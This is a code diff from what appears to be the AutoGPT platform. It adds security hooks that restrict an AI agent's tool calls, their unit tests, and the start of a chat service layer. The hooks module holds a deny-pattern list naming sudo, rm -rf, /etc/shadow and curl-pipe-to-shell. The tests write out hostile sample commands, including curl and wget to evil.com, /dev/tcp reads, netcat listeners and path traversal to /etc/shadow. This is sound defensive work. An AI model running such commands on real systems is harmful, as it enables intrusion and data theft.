+    adapter.convert_message(
+        AssistantMessage(
+            content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
+            model="test",
+        )
+    )
+    # Send tool result (closes step)
+    adapter.convert_message(
+        UserMessage(content=[ToolResultBlock(tool_use_id="t1", content="ok")])
+    )
+    results = adapter.convert_message(
+        AssistantMessage(content=[TextBlock(text="after")], model="test")
+    )
+    # Should get StreamStartStep (new step) + StreamTextStart (new block) + StreamTextDelta
+    assert len(results) == 3
+    assert isinstance(results[0], StreamStartStep)
+    assert isinstance(results[1], StreamTextStart)
+    assert isinstance(results[2], StreamTextDelta)
+    assert results[2].delta == "after"
+
+
+# -- Full conversation flow --------------------------------------------------
+
+
+def test_full_conversation_flow():
+    """Simulate a complete conversation: init -> text -> tool -> result -> text -> finish."""
+    adapter = _adapter()
+    all_responses: list[StreamBaseResponse] = []
+
+    # 1. Init
+    all_responses.extend(
+        adapter.convert_message(SystemMessage(subtype="init", data={}))
+    )
+    # 2. Assistant text
+    all_responses.extend(
+        adapter.convert_message(
+            AssistantMessage(content=[TextBlock(text="Let me search")], model="test")
+        )
+    )
+    # 3. Tool use
+    all_responses.extend(
+        adapter.convert_message(
+            AssistantMessage(
+                content=[
+                    ToolUseBlock(
+                        id="t1",
+                        name=f"{MCP_TOOL_PREFIX}find_agent",
+                        input={"query": "email"},
+                    )
+                ],
+                model="test",
+            )
+        )
+    )
+    # 4. Tool result
+    all_responses.extend(
+        adapter.convert_message(
+            UserMessage(
+                content=[ToolResultBlock(tool_use_id="t1", content="Found 2 agents")]
+            )
+        )
+    )
+    # 5. More text
+    all_responses.extend(
+        adapter.convert_message(
+            AssistantMessage(content=[TextBlock(text="I found 2")], model="test")
+        )
+    )
+    # 6. Result
+    all_responses.extend(
+        adapter.convert_message(
+            ResultMessage(
+                subtype="success",
+                duration_ms=500,
+                duration_api_ms=400,
+                is_error=False,
+                num_turns=2,
+                session_id="s1",
+            )
+        )
+    )
+
+    types = [type(r).__name__ for r in all_responses]
+    assert types == [
+        "StreamStart",
+        "StreamStartStep",  # step 1: text + tool call
+        "StreamTextStart",
+        "StreamTextDelta",  # "Let me search"
+        "StreamTextEnd",  # closed before tool
+        "StreamToolInputStart",
+        "StreamToolInputAvailable",
+        "StreamToolOutputAvailable",  # tool result
+        "StreamFinishStep",  # step 1 closed after tool result
+        "StreamStartStep",  # step 2: continuation text
+        "StreamTextStart",  # new block after tool
+        "StreamTextDelta",  # "I found 2"
+        "StreamTextEnd",  # closed by result
+        "StreamFinishStep",  # step 2 closed
+        "StreamFinish",
+    ]
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/security_hooks.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/security_hooks.py
@@ -0,0 +1,393 @@
+"""Security hooks for Claude Agent SDK integration.
+
+This module provides security hooks that validate tool calls before execution,
+ensuring multi-user isolation and preventing unauthorized operations.
+"""
+
+import json
+import logging
+import os
+import re
+import shlex
+from typing import Any, cast
+
+from backend.api.features.chat.sdk.tool_adapter import MCP_TOOL_PREFIX
+
+logger = logging.getLogger(__name__)
+
+# Tools that are blocked entirely (CLI/system access)
+BLOCKED_TOOLS = {
+    "bash",
+    "shell",
+    "exec",
+    "terminal",
+    "command",
+}
+
+# Safe read-only commands allowed in the sandboxed Bash tool.
+# These are data-processing / inspection utilities — no writes, no network.
+ALLOWED_BASH_COMMANDS = {
+    # JSON / structured data
+    "jq",
+    # Text processing
+    "grep",
+    "egrep",
+    "fgrep",
+    "rg",
+    "head",
+    "tail",
+    "cat",
+    "wc",
+    "sort",
+    "uniq",
+    "cut",
+    "tr",
+    "sed",
+    "awk",
+    "column",
+    "fold",
+    "fmt",
+    "nl",
+    "paste",
+    "rev",
+    # File inspection (read-only)
+    "find",
+    "ls",
+    "file",
+    "stat",
+    "du",
+    "tree",
+    "basename",
+    "dirname",
+    "realpath",
+    # Utilities
+    "echo",
+    "printf",
+    "date",
+    "true",
+    "false",
+    "xargs",
+    "tee",
+    # Comparison / encoding
+    "diff",
+    "comm",
+    "base64",
+    "md5sum",
+    "sha256sum",
+}
+
+# Tools allowed only when their path argument stays within the SDK workspace.
+# The SDK uses these to handle oversized tool results (writes to tool-results/
+# files, then reads them back) and for workspace file operations.
+WORKSPACE_SCOPED_TOOLS = {"Read", "Write", "Edit", "Glob", "Grep"}
+
+# Tools that get sandboxed Bash validation (command allowlist + workspace paths).
+SANDBOXED_BASH_TOOLS = {"Bash"}
+
+# Dangerous patterns in tool inputs
+DANGEROUS_PATTERNS = [
+    r"sudo",
+    r"rm\s+-rf",
+    r"dd\s+if=",
+    r"/etc/passwd",
+    r"/etc/shadow",
+    r"chmod\s+777",
+    r"curl\s+.*\|.*sh",
+    r"wget\s+.*\|.*sh",
+    r"eval\s*\(",
+    r"exec\s*\(",
+    r"__import__",
+    r"os\.system",
+    r"subprocess",
+]
+
+
+def _deny(reason: str) -> dict[str, Any]:
+    """Return a hook denial response."""
+    return {
+        "hookSpecificOutput": {
+            "hookEventName": "PreToolUse",
+            "permissionDecision": "deny",
+            "permissionDecisionReason": reason,
+        }
+    }
+
+
+def _validate_workspace_path(
+    tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None
+) -> dict[str, Any]:
+    """Validate that a workspace-scoped tool only accesses allowed paths.
+
+    Allowed directories:
+    - The SDK working directory (``/tmp/copilot-<session>/``)
+    - The SDK tool-results directory (``~/.claude/projects/…/tool-results/``)
+    """
+    path = tool_input.get("file_path") or tool_input.get("path") or ""
+    if not path:
+        # Glob/Grep without a path default to cwd which is already sandboxed
+        return {}
+
+    resolved = os.path.normpath(os.path.expanduser(path))
+
+    # Allow access within the SDK working directory
+    if sdk_cwd:
+        norm_cwd = os.path.normpath(sdk_cwd)
+        if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
+            return {}
+
+    # Allow access to ~/.claude/projects/*/tool-results/ (big tool results)
+    claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
+    if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
+        return {}
+
+    logger.warning(
+        f"Blocked {tool_name} outside workspace: {path} (resolved={resolved})"
+    )
+    return _deny(
+        f"Tool '{tool_name}' can only access files within the workspace directory."
+    )
+
+
+def _validate_bash_command(
+    tool_input: dict[str, Any], sdk_cwd: str | None
+) -> dict[str, Any]:
+    """Validate a Bash command against the allowlist of safe commands.
+
+    Only read-only data-processing commands are allowed (jq, grep, head, etc.).
+    Blocks command substitution, output redirection, and disallowed executables.
+
+    Uses ``shlex.split`` to properly handle quoted strings (e.g. jq filters
+    containing ``|`` won't be mistaken for shell pipes).
+    """
+    command = tool_input.get("command", "")
+    if not command or not isinstance(command, str):
+        return _deny("Bash command is empty.")
+
+    # Block command substitution — can smuggle arbitrary commands
+    if "$(" in command or "`" in command:
+        return _deny("Command substitution ($() or ``) is not allowed in Bash.")
+
+    # Block output redirection — Bash should be read-only
+    if re.search(r"(?<!\d)>{1,2}\s", command):
+        return _deny("Output redirection (> or >>) is not allowed in Bash.")
+
+    # Block /dev/ access (e.g., /dev/tcp for network)
+    if "/dev/" in command:
+        return _deny("Access to /dev/ is not allowed in Bash.")
+
+    # Tokenize with shlex (respects quotes), then extract command names.
+    # shlex preserves shell operators like | ; && || as separate tokens.
+    try:
+        tokens = shlex.split(command)
+    except ValueError:
+        return _deny("Malformed command (unmatched quotes).")
+
+    # Walk tokens: the first non-assignment token after a pipe/separator is a command.
+    expect_command = True
+    for token in tokens:
+        if token in ("|", "||", "&&", ";"):
+            expect_command = True
+            continue
+        if expect_command:
+            # Skip env var assignments (VAR=value)
+            if "=" in token and not token.startswith("-"):
+                continue
+            cmd_name = os.path.basename(token)
+            if cmd_name not in ALLOWED_BASH_COMMANDS:
+                allowed = ", ".join(sorted(ALLOWED_BASH_COMMANDS))
+                logger.warning(f"Blocked Bash command: {cmd_name}")
+                return _deny(
+                    f"Command '{cmd_name}' is not allowed. "
+                    f"Allowed commands: {allowed}"
+                )
+            expect_command = False
+
+    # Validate absolute file paths stay within workspace
+    if sdk_cwd:
+        norm_cwd = os.path.normpath(sdk_cwd)
+        claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
+        for token in tokens:
+            if not token.startswith("/"):
+                continue
+            resolved = os.path.normpath(token)
+            if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
+                continue
+            if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
+                continue
+            logger.warning(f"Blocked Bash path outside workspace: {token}")
+            return _deny(
+                f"Bash can only access files within the workspace directory. "
+                f"Path '{token}' is outside the workspace."
+            )
+
+    return {}
+
+
+def _validate_tool_access(
+    tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None = None
+) -> dict[str, Any]:
+    """Validate that a tool call is allowed.
+
+    Returns:
+        Empty dict to allow, or dict with hookSpecificOutput to deny
+    """
+    # Block forbidden tools
+    if tool_name in BLOCKED_TOOLS:
+        logger.warning(f"Blocked tool access attempt: {tool_name}")
+        return _deny(
+            f"Tool '{tool_name}' is not available. "
+            "Use the CoPilot-specific tools instead."
+        )
+
+    # Sandboxed Bash: only allowlisted commands, workspace-scoped paths
+    if tool_name in SANDBOXED_BASH_TOOLS:
+        return _validate_bash_command(tool_input, sdk_cwd)
+
+    # Workspace-scoped tools: allowed only within the SDK workspace directory
+    if tool_name in WORKSPACE_SCOPED_TOOLS:
+        return _validate_workspace_path(tool_name, tool_input, sdk_cwd)
+
+    # Check for dangerous patterns in tool input
+    # Use json.dumps for predictable format (str() produces Python repr)
+    input_str = json.dumps(tool_input) if tool_input else ""
+
+    for pattern in DANGEROUS_PATTERNS:
+        if re.search(pattern, input_str, re.IGNORECASE):
+            logger.warning(
+                f"Blocked dangerous pattern in tool input: {pattern} in {tool_name}"
+            )
+            return _deny("Input contains blocked pattern")
+
+    return {}
+
+
+def _validate_user_isolation(
+    tool_name: str, tool_input: dict[str, Any], user_id: str | None
+) -> dict[str, Any]:
+    """Validate that tool calls respect user isolation."""
+    # For workspace file tools, ensure path doesn't escape
+    if "workspace" in tool_name.lower():
+        path = tool_input.get("path", "") or tool_input.get("file_path", "")
+        if path:
+            # Check for path traversal
+            if ".." in path or path.startswith("/"):
+                logger.warning(
+                    f"Blocked path traversal attempt: {path} by user {user_id}"
+                )
+                return {
+                    "hookSpecificOutput": {
+                        "hookEventName": "PreToolUse",
+                        "permissionDecision": "deny",
+                        "permissionDecisionReason": "Path traversal not allowed",
+                    }
+                }
+
+    return {}
+
+
+def create_security_hooks(
+    user_id: str | None, sdk_cwd: str | None = None
+) -> dict[str, Any]:
+    """Create the security hooks configuration for Claude Agent SDK.
+
+    Includes security validation and observability hooks:
+    - PreToolUse: Security validation before tool execution
+    - PostToolUse: Log successful tool executions
+    - PostToolUseFailure: Log and handle failed tool executions
+    - PreCompact: Log context compaction events (SDK handles compaction automatically)
+
+    Args:
+        user_id: Current user ID for isolation validation
+        sdk_cwd: SDK working directory for workspace-scoped tool validation
+
+    Returns:
+        Hooks configuration dict for ClaudeAgentOptions
+    """
+    try:
+        from claude_agent_sdk import HookMatcher
+        from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
+
+        async def pre_tool_use_hook(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Combined pre-tool-use validation hook."""
+            _ = context  # unused but required by signature
+            tool_name = cast(str, input_data.get("tool_name", ""))
+            tool_input = cast(dict[str, Any], input_data.get("tool_input", {}))
+
+            # Strip MCP prefix for consistent validation
+            is_copilot_tool = tool_name.startswith(MCP_TOOL_PREFIX)
+            clean_name = tool_name.removeprefix(MCP_TOOL_PREFIX)
+
+            # Only block non-CoPilot tools; our MCP-registered tools
+            # (including Read for oversized results) are already sandboxed.
+            if not is_copilot_tool:
+                result = _validate_tool_access(clean_name, tool_input, sdk_cwd)
+                if result:
+                    return cast(SyncHookJSONOutput, result)
+
+            # Validate user isolation
+            result = _validate_user_isolation(clean_name, tool_input, user_id)
+            if result:
+                return cast(SyncHookJSONOutput, result)
+
+            logger.debug(f"[SDK] Tool start: {tool_name}, user={user_id}")
+            return cast(SyncHookJSONOutput, {})
+
+        async def post_tool_use_hook(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Log successful tool executions for observability."""
+            _ = context
+            tool_name = cast(str, input_data.get("tool_name", ""))
+            logger.debug(f"[SDK] Tool success: {tool_name}, tool_use_id={tool_use_id}")
+            return cast(SyncHookJSONOutput, {})
+
+        async def post_tool_failure_hook(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Log failed tool executions for debugging."""
+            _ = context
+            tool_name = cast(str, input_data.get("tool_name", ""))
+            error = input_data.get("error", "Unknown error")
+            logger.warning(
+                f"[SDK] Tool failed: {tool_name}, error={error}, "
+                f"user={user_id}, tool_use_id={tool_use_id}"
+            )
+            return cast(SyncHookJSONOutput, {})
+
+        async def pre_compact_hook(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Log when SDK triggers context compaction.
+
+            The SDK automatically compacts conversation history when it grows too large.
+            This hook provides visibility into when compaction happens.
+            """
+            _ = context, tool_use_id
+            trigger = input_data.get("trigger", "auto")
+            logger.info(
+                f"[SDK] Context compaction triggered: {trigger}, user={user_id}"
+            )
+            return cast(SyncHookJSONOutput, {})
+
+        return {
+            "PreToolUse": [HookMatcher(matcher="*", hooks=[pre_tool_use_hook])],
+            "PostToolUse": [HookMatcher(matcher="*", hooks=[post_tool_use_hook])],
+            "PostToolUseFailure": [
+                HookMatcher(matcher="*", hooks=[post_tool_failure_hook])
+            ],
+            "PreCompact": [HookMatcher(matcher="*", hooks=[pre_compact_hook])],
+        }
+    except ImportError:
+        # Fallback for when SDK isn't available - return empty hooks
+        logger.warning("claude-agent-sdk not available, security hooks disabled")
+        return {}
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/security_hooks_test.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/security_hooks_test.py
@@ -0,0 +1,258 @@
+"""Unit tests for SDK security hooks."""
+
+import os
+
+from .security_hooks import _validate_tool_access, _validate_user_isolation
+
+SDK_CWD = "/tmp/copilot-abc123"
+
+
+def _is_denied(result: dict) -> bool:
+    hook = result.get("hookSpecificOutput", {})
+    return hook.get("permissionDecision") == "deny"
+
+
+# -- Blocked tools -----------------------------------------------------------
+
+
+def test_blocked_tools_denied():
+    for tool in ("bash", "shell", "exec", "terminal", "command"):
+        result = _validate_tool_access(tool, {})
+        assert _is_denied(result), f"{tool} should be blocked"
+
+
+def test_unknown_tool_allowed():
+    result = _validate_tool_access("SomeCustomTool", {})
+    assert result == {}
+
+
+# -- Workspace-scoped tools --------------------------------------------------
+
+
+def test_read_within_workspace_allowed():
+    result = _validate_tool_access(
+        "Read", {"file_path": f"{SDK_CWD}/file.txt"}, sdk_cwd=SDK_CWD
+    )
+    assert result == {}
+
+
+def test_write_within_workspace_allowed():
+    result = _validate_tool_access(
+        "Write", {"file_path": f"{SDK_CWD}/output.json"}, sdk_cwd=SDK_CWD
+    )
+    assert result == {}
+
+
+def test_edit_within_workspace_allowed():
+    result = _validate_tool_access(
+        "Edit", {"file_path": f"{SDK_CWD}/src/main.py"}, sdk_cwd=SDK_CWD
+    )
+    assert result == {}
+
+
+def test_glob_within_workspace_allowed():
+    result = _validate_tool_access("Glob", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
+    assert result == {}
+
+
+def test_grep_within_workspace_allowed():
+    result = _validate_tool_access("Grep", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
+    assert result == {}
+
+
+def test_read_outside_workspace_denied():
+    result = _validate_tool_access(
+        "Read", {"file_path": "/etc/passwd"}, sdk_cwd=SDK_CWD
+    )
+    assert _is_denied(result)
+
+
+def test_write_outside_workspace_denied():
+    result = _validate_tool_access(
+        "Write", {"file_path": "/home/user/secrets.txt"}, sdk_cwd=SDK_CWD
+    )
+    assert _is_denied(result)
+
+
+def test_traversal_attack_denied():
+    result = _validate_tool_access(
+        "Read",
+        {"file_path": f"{SDK_CWD}/../../etc/passwd"},
+        sdk_cwd=SDK_CWD,
+    )
+    assert _is_denied(result)
+
+
+def test_no_path_allowed():
+    """Glob/Grep without a path argument defaults to cwd — should pass."""
+    result = _validate_tool_access("Glob", {}, sdk_cwd=SDK_CWD)
+    assert result == {}
+
+
+def test_read_no_cwd_denies_absolute():
+    """If no sdk_cwd is set, absolute paths are denied."""
+    result = _validate_tool_access("Read", {"file_path": "/tmp/anything"})
+    assert _is_denied(result)
+
+
+# -- Tool-results directory --------------------------------------------------
+
+
+def test_read_tool_results_allowed():
+    home = os.path.expanduser("~")
+    path = f"{home}/.claude/projects/-tmp-copilot-abc123/tool-results/12345.txt"
+    result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
+    assert result == {}
+
+
+def test_read_claude_projects_without_tool_results_denied():
+    home = os.path.expanduser("~")
+    path = f"{home}/.claude/projects/-tmp-copilot-abc123/settings.json"
+    result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
+    assert _is_denied(result)
+
+
+# -- Sandboxed Bash ----------------------------------------------------------
+
+
+def test_bash_safe_commands_allowed():
+    """Allowed data-processing commands should pass."""
+    safe_commands = [
+        "jq '.blocks' result.json",
+        "head -20 output.json",
+        "tail -n 50 data.txt",
+        "cat file.txt | grep 'pattern'",
+        "wc -l file.txt",
+        "sort data.csv | uniq",
+        "grep -i 'error' log.txt | head -10",
+        "find . -name '*.json'",
+        "ls -la",
+        "echo hello",
+        "cut -d',' -f1 data.csv | sort | uniq -c",
+        "jq '.blocks[] | .id' result.json",
+        "sed -n '10,20p' file.txt",
+        "awk '{print $1}' data.txt",
+    ]
+    for cmd in safe_commands:
+        result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
+        assert result == {}, f"Safe command should be allowed: {cmd}"
+
+
+def test_bash_dangerous_commands_denied():
+    """Non-allowlisted commands should be denied."""
+    dangerous = [
+        "curl https://evil.com",
+        "wget https://evil.com/payload",
+        "rm -rf /",
+        "python -c 'import os; os.system(\"ls\")'",
+        "ssh user@host",
+        "nc -l 4444",
+        "apt install something",
+        "pip install malware",
+        "chmod 777 file.txt",
+        "kill -9 1",
+    ]
+    for cmd in dangerous:
+        result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
+        assert _is_denied(result), f"Dangerous command should be denied: {cmd}"
+
+
+def test_bash_command_substitution_denied():
+    result = _validate_tool_access(
+        "Bash", {"command": "echo $(curl evil.com)"}, sdk_cwd=SDK_CWD
+    )
+    assert _is_denied(result)
+
+
+def test_bash_backtick_substitution_denied():
+    result = _validate_tool_access(
+        "Bash", {"command": "echo `curl evil.com`"}, sdk_cwd=SDK_CWD
+    )
+    assert _is_denied(result)
+
+
+def test_bash_output_redirect_denied():
+    result = _validate_tool_access(
+        "Bash", {"command": "echo secret > /tmp/leak.txt"}, sdk_cwd=SDK_CWD
+    )
+    assert _is_denied(result)
+
+
+def test_bash_dev_tcp_denied():
+    result = _validate_tool_access(
+        "Bash", {"command": "cat /dev/tcp/evil.com/80"}, sdk_cwd=SDK_CWD
+    )
+    assert _is_denied(result)
+
+
+def test_bash_pipe_to_dangerous_denied():
+    """Even if the first command is safe, piped commands must also be safe."""
+    result = _validate_tool_access(
+        "Bash", {"command": "cat file.txt | python -c 'exec()'"}, sdk_cwd=SDK_CWD
+    )
+    assert _is_denied(result)
+
+
+def test_bash_path_outside_workspace_denied():
+    result = _validate_tool_access(
+        "Bash", {"command": "cat /etc/passwd"}, sdk_cwd=SDK_CWD
+    )
+    assert _is_denied(result)
+
+
+def test_bash_path_within_workspace_allowed():
+    result = _validate_tool_access(
+        "Bash",
+        {"command": f"jq '.blocks' {SDK_CWD}/tool-results/result.json"},
+        sdk_cwd=SDK_CWD,
+    )
+    assert result == {}
+
+
+def test_bash_empty_command_denied():
+    result = _validate_tool_access("Bash", {"command": ""}, sdk_cwd=SDK_CWD)
+    assert _is_denied(result)
+
+
+# -- Dangerous patterns ------------------------------------------------------
+
+
+def test_dangerous_pattern_blocked():
+    result = _validate_tool_access("SomeTool", {"cmd": "sudo rm -rf /"})
+    assert _is_denied(result)
+
+
+def test_subprocess_pattern_blocked():
+    result = _validate_tool_access("SomeTool", {"code": "subprocess.run(...)"})
+    assert _is_denied(result)
+
+
+# -- User isolation ----------------------------------------------------------
+
+
+def test_workspace_path_traversal_blocked():
+    result = _validate_user_isolation(
+        "workspace_read", {"path": "../../../etc/shadow"}, user_id="user-1"
+    )
+    assert _is_denied(result)
+
+
+def test_workspace_absolute_path_blocked():
+    result = _validate_user_isolation(
+        "workspace_read", {"path": "/etc/passwd"}, user_id="user-1"
+    )
+    assert _is_denied(result)
+
+
+def test_workspace_normal_path_allowed():
+    result = _validate_user_isolation(
+        "workspace_read", {"path": "src/main.py"}, user_id="user-1"
+    )
+    assert result == {}
+
+
+def test_non_workspace_tool_passes_isolation():
+    result = _validate_user_isolation(
+        "find_agent", {"query": "email"}, user_id="user-1"
+    )
+    assert result == {}
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/service.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/service.py
@@ -0,0 +1,556 @@
+"""Claude Agent SDK service layer for CoPilot chat completions."""
+
+import asyncio
+import json
+import logging
+import os
+import re
+import uuid
+from collections.abc import AsyncGenerator
+from typing import Any
+
+from backend.util.exceptions import NotFoundError
+
+from ..config import ChatConfig
+from ..model import (
+    ChatMessage,
+    ChatSession,
+    Usage,
+    get_chat_session,
+    update_session_title,
+    upsert_chat_session,
+)
+from ..response_model import (
+    StreamBaseResponse,
+    StreamError,
+    StreamFinish,
+    StreamStart,
+    StreamTextDelta,
+    StreamToolInputAvailable,
+    StreamToolOutputAvailable,
+    StreamUsage,
+)
+from ..service import _build_system_prompt, _generate_session_title
+from ..tracking import track_user_message
+from .anthropic_fallback import stream_with_anthropic
+from .response_adapter import SDKResponseAdapter
+from .security_hooks import create_security_hooks
+from .tool_adapter import (
+    COPILOT_TOOL_NAMES,
+    create_copilot_mcp_server,
+    set_execution_context,
+)
+from .tracing import TracedSession, create_tracing_hooks, merge_hooks
+
+logger = logging.getLogger(__name__)
+config = ChatConfig()
+
+# Set to hold background tasks to prevent garbage collection
+_background_tasks: set[asyncio.Task[Any]] = set()
+
+
+_SDK_CWD_PREFIX = "/tmp/copilot-"
+
+# Appended to the system prompt to inform the agent about Bash restrictions.
+# The SDK already describes each tool (Read, Write, Edit, Glob, Grep, Bash),
+# but it doesn't know about our security hooks' command allowlist for Bash.
+_SDK_TOOL_SUPPLEMENT = """
+
+## Bash restrictions
+
+The Bash tool is restricted to safe, read-only data-processing commands:
+jq, grep, head, tail, cat, wc, sort, uniq, cut, tr, sed, awk, find, ls,
+echo, diff, base64, and similar utilities.
+Network commands (curl, wget), destructive commands (rm, chmod), and
+interpreters (python, node) are NOT available.
+"""
+
+
+def _resolve_sdk_model() -> str | None:
+    """Resolve the model name for the Claude Agent SDK CLI.
+
+    Uses ``config.claude_agent_model`` if set, otherwise derives from
+    ``config.model`` by stripping the OpenRouter provider prefix (e.g.,
+    ``"anthropic/claude-opus-4.6"`` → ``"claude-opus-4.6"``).
+    """
+    if config.claude_agent_model:
+        return config.claude_agent_model
+    model = config.model
+    if "/" in model:
+        return model.split("/", 1)[1]
+    return model
+
+
+def _build_sdk_env() -> dict[str, str]:
+    """Build env vars for the SDK CLI process.
+
+    Routes API calls through OpenRouter (or a custom base_url) using
+    the same ``config.api_key`` / ``config.base_url`` as the non-SDK path.
+    This gives per-call token and cost tracking on the OpenRouter dashboard.
+
+    Only overrides ``ANTHROPIC_API_KEY`` when a valid proxy URL and auth
+    token are both present — otherwise returns an empty dict so the SDK
+    falls back to its default credentials.
+    """
+    env: dict[str, str] = {}
+    if config.api_key and config.base_url:
+        # Strip /v1 suffix — SDK expects the base URL without a version path
+        base = config.base_url.rstrip("/")
+        if base.endswith("/v1"):
+            base = base[:-3]
+        if not base or not base.startswith("http"):
+            # Invalid base_url — don't override SDK defaults
+            return env
+        env["ANTHROPIC_BASE_URL"] = base
+        env["ANTHROPIC_AUTH_TOKEN"] = config.api_key
+        # Must be explicitly empty so the CLI uses AUTH_TOKEN instead
+        env["ANTHROPIC_API_KEY"] = ""
+    return env
+
+
+def _make_sdk_cwd(session_id: str) -> str:
+    """Create a safe, session-specific working directory path.
+
+    Sanitizes session_id, then validates the resulting path stays under /tmp/
+    using normpath + startswith (the pattern CodeQL recognises as a sanitizer).
+    """
+    # Step 1: Sanitize - only allow alphanumeric and hyphens
+    safe_id = re.sub(r"[^A-Za-z0-9-]", "", session_id)
+    if not safe_id:
+        raise ValueError("Session ID is empty after sanitization")
+
+    # Step 2: Construct path with known-safe prefix
+    cwd = os.path.normpath(f"{_SDK_CWD_PREFIX}{safe_id}")
+
+    # Step 3: Validate the path is still under our prefix (prevent traversal)
+    if not cwd.startswith(_SDK_CWD_PREFIX):
+        raise ValueError(f"Session path escaped prefix: {cwd}")
+
+    # Step 4: Additional assertion for defense-in-depth
+    assert cwd.startswith("/tmp/copilot-"), f"Path validation failed: {cwd}"
+
+    return cwd
+
+
+def _cleanup_sdk_tool_results(cwd: str) -> None:
+    """Remove SDK tool-result files for a specific session working directory.
+
+    The SDK creates tool-result files under ~/.claude/projects/<encoded-cwd>/tool-results/.
+    We clean only the specific cwd's results to avoid race conditions between
+    concurrent sessions.
+
+    Security: cwd MUST be created by _make_sdk_cwd() which sanitizes session_id.
+    """
+    import shutil
+
+    # Security check 1: Validate cwd is under the expected prefix
+    normalized = os.path.normpath(cwd)
+    if not normalized.startswith(_SDK_CWD_PREFIX):
+        logger.warning(f"[SDK] Rejecting cleanup for invalid path: {cwd}")
+        return
+
+    # Security check 2: Ensure no path traversal in the normalized path
+    if ".." in normalized:
+        logger.warning(f"[SDK] Rejecting cleanup for traversal attempt: {cwd}")
+        return
+
+    # SDK encodes the cwd path by replacing '/' with '-'
+    encoded_cwd = normalized.replace("/", "-")
+
+    # Construct the project directory path (known-safe home expansion)
+    claude_projects = os.path.expanduser("~/.claude/projects")
+    project_dir = os.path.join(claude_projects, encoded_cwd)
+
+    # Security check 3: Validate project_dir is under ~/.claude/projects
+    project_dir = os.path.normpath(project_dir)
+    if not project_dir.startswith(claude_projects):
+        logger.warning(
+            f"[SDK] Rejecting cleanup for escaped project path: {project_dir}"
+        )
+        return
+
+    results_dir = os.path.join(project_dir, "tool-results")
+    if os.path.isdir(results_dir):
+        for filename in os.listdir(results_dir):
+            file_path = os.path.join(results_dir, filename)
+            try:
+                if os.path.isfile(file_path):
+                    os.remove(file_path)
+            except OSError:
+                pass
+
+    # Also clean up the temp cwd directory itself
+    try:
+        shutil.rmtree(normalized, ignore_errors=True)
+    except OSError:
+        pass
+
+
+async def _compress_conversation_history(
+    session: ChatSession,
+) -> list[ChatMessage]:
+    """Compress prior conversation messages if they exceed the token threshold.
+
+    Uses the shared compress_context() from prompt.py which supports:
+    - LLM summarization of old messages (keeps recent ones intact)
+    - Progressive content truncation as fallback
+    - Middle-out deletion as last resort
+
+    Returns the compressed prior messages (everything except the current message).
+    """
+    prior = session.messages[:-1]
+    if len(prior) < 2:
+        return prior
+
+    from backend.util.prompt import compress_context
+
+    # Convert ChatMessages to dicts for compress_context
+    messages_dict = []
+    for msg in prior:
+        msg_dict: dict[str, Any] = {"role": msg.role}
+        if msg.content:
+            msg_dict["content"] = msg.content
+        if msg.tool_calls:
+            msg_dict["tool_calls"] = msg.tool_calls
+        if msg.tool_call_id:
+            msg_dict["tool_call_id"] = msg.tool_call_id
+        messages_dict.append(msg_dict)
+
+    try:
+        import openai
+
+        async with openai.AsyncOpenAI(
+            api_key=config.api_key, base_url=config.base_url, timeout=30.0
+        ) as client:
+            result = await compress_context(
+                messages=messages_dict,
+                model=config.model,
+                client=client,
+            )
+    except Exception as e:
+        logger.warning(f"[SDK] Context compression with LLM failed: {e}")
+        # Fall back to truncation-only (no LLM summarization)
+        result = await compress_context(
+            messages=messages_dict,
+            model=config.model,
+            client=None,
+        )
+
+    if result.was_compacted:
+        logger.info(
+            f"[SDK] Context compacted: {result.original_token_count} -> "
+            f"{result.token_count} tokens "
+            f"({result.messages_summarized} summarized, "
+            f"{result.messages_dropped} dropped)"
+        )
+        # Convert compressed dicts back to ChatMessages
+        return [
+            ChatMessage(
+                role=m["role"],
+                content=m.get("content"),
+                tool_calls=m.get("tool_calls"),
+                tool_call_id=m.get("tool_call_id"),
+            )
+            for m in result.messages
+        ]
+
+    return prior
+
+
+def _format_conversation_context(messages: list[ChatMessage]) -> str | None:
+    """Format conversation messages into a context prefix for the user message.
+
+    Returns a string like:
+        <conversation_history>
+        User: hello
+        You responded: Hi! How can I help?
+        </conversation_history>
+
+    Returns None if there are no messages to format.
+    """
+    if not messages:
+        return None
+
+    lines: list[str] = []
+    for msg in messages:
+        if not msg.content:
+            continue
+        if msg.role == "user":
+            lines.append(f"User: {msg.content}")
+        elif msg.role == "assistant":
+            lines.append(f"You responded: {msg.content}")
+        # Skip tool messages — they're internal details
+
+    if not lines:
+        return None
+
+    return "<conversation_history>\n" + "\n".join(lines) + "\n</conversation_history>"
+
+
+async def stream_chat_completion_sdk(
+    session_id: str,
+    message: str | None = None,
+    tool_call_response: str | None = None,  # noqa: ARG001
+    is_user_message: bool = True,
+    user_id: str | None = None,
+    retry_count: int = 0,  # noqa: ARG001
+    session: ChatSession | None = None,
